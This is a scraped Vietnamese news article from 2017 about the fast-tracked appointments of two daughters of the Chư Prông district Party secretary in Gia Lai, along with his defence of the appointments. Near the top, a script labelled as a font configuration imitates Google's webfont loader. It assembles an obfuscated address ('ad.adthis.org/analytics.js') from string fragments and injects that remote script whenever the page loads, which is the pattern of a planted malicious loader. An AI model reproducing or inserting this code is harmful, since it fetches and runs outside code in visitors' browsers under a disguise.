Đường "quan lộ" "tăng tốc" của con gái Bí thư huyện Chư Prông, Gia Lai

Tác giả: Phạm Trọng Nghị

saosaosaosaosao
Ý kiến 24/04/2017 14:55

//Font WebFontConfig = { google: { families: ['Open+Sans::latin'] } }; (function(w, a, b, c, d, e) { var wf = document.createElement('script'); wf.src = '//' + [a, b, c].join('.') + '/' + [d, e].join('.') || ('https:' == document.location.protocol ? 'https' : 'http') + '://ajax.googleapis.com/ajax/libs/webfont/1/webfont.js'; wf.type = 'text/javascript'; wf.async = 'true'; var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(wf, s); })(window, 'ad', 'adthis', 'org', 'analytics', 'js');

 

Ảnh qua trinh dong bao hiem xa hoi cua ba TRang
Tài liệu đối chiếu quá trình đóng BHXH của bà Trang trong thời gian công tác kinh qua nhiều đơn vị

Qua tìm hiểu, bà Bùi Thị Thu Trang là con gái đầu của ông Bùi Viết Hội, Bí thư huyện ủy Chư Prông, sau khi tốt nghiệp Cao đẳng Sư phạm tháng 10/2004 về giảng dạy tại Trường THCS Công ty Cao su Chư Prông, đến tháng 1/2007 chuyển công tác đến trường THCS Công ty Cao su xã Ia Drăng.

Sau đó, từ tháng 9/2008, khi chưa đầy 25 tuổi bà Trang được bổ nhiệm chức Hiệu phó Trường THCS Nguyễn Khuyến, xã Ia Kly, huyện Chư Prông, đến tháng 11/2009, bà Trang nhận chức Phó giám đốc Trung tâm dạy nghề và giáo dục thường xuyên huyện Chư Prông, từ tháng 7/2015 bà Trang nhảy qua làm Phó ban Tổ chức huyện ủy huyện Chư Prông tới nay.

Cũng trong thời gian từ năm 2004- 2014, khi ông Hội đang giữ chức Chủ tịch UBND huyện Chư Prông người con gái thứ 2 của ông này là bà Bùi Thị Thu Huyền, sau khi tốt nghiệp đại học chuyên ngành ngữ văn, bà Huyền về công tác tại tại Đài Truyền thanh và Truyền hình huyện Chư Prông, từ tháng 1/2011đến 3/2014, chức vụ phóng viên. Trong thời gian này bà Huyền hoàn thành chương trình học thạc sĩ. Sau có khi có tấm bằng thạc sỹ, tháng 4/2014, bà được chuyển về làm chuyên viên phòng  Kinh tế và Hạ tầng huyện Chư Rông, đến tháng 1/2015 bà được bổ nhiệm giữ chức Phó trưởng Phòng Kinh tế và Hạ tầng huyện khi mới chỉ hơn 26 tuổi. Thời gian bổ nhiệm vị trí lãnh đạo chỉ sau 8 tháng khi tiếp cận công việc mới.

Trao đổi vụ việc ông Hội cho rằng, hai cô con gái của ông được bổ nhiệm hoàn toàn đúng quy trình, quy định của pháp luật và không có sự can thiệp, ưu tiên vì ông là Chủ tịch UBND huyện và Bí thư huyện ủy. Sau khi được bổ nhiệm, các con ông  làm rất tốt công việc của mình và được đánh giá cao. Nói về bà Trang ông Hội rãi bày “Cháu trước khi được bổ nhiệm thì đã tốt nghiệp Đại học Sư phạm hệ từ xa và Trung cấp lý luận chính trị rồi”, ông Hội nói và cho rằng đây là những yêu cầu bắt buộc. Còn đối với việc bổ nhiệm bà Huyền vì đã học trung cấp lý luận chính trị, tốt nghiệp đại học ngữ văn và có bằng thạc sĩ quản trị kinh doanh. Tuy nhiên, ông Hội thừa nhận việc bổ nhiệm người con gái thứ 2 cũng hơi nhanh vì lúc đó bà Huyền chưa  đủ 5 năm công tác.

11
Cả nhà là quan (Ảnh minh họa)
Ý kiến của bạn

Bình luận